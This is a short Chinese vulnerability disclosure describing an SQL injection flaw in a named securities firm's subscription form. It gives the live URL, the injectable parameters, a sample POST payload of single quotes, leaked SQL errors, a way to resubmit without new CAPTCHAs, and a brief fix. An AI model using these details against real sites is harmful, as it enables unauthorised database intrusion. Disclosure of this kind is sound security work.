国信证券主站SQL注入漏洞下载

来源:黑吧安全网 浏览:1071次 时间:2014-04-29
做网站找雨过天晴工作室

国信证券某站表单过滤不严,爆出sql语句,可盲注

漏洞地址:http://bj.guosen.com.cn/index.php?s=/Html/Subscribe/

注入参数:name,tel

表单

post数据例子:

 

posts=1&name=%27&tel=%27&verify=%27&__hash__=834853f5222e8037bde233d71f13f63d



查看返回数据,出现

sql:SELECT   * FROM cms_class WHERE  parentid=32



验证码错误一直爆出这个语句。



验证码正确填写,姓名电话填写单引号,报错:

 

into cms_book("name", "tel", "tiestamp") values( ''', ''', '2014-02-08 20:52:24' )



可见未过滤单引号。



另外,每次提交数据,验证码和__hash__没有销毁,可反复提交注入,不必每次填写验证码。

修补方案:过滤,除去报错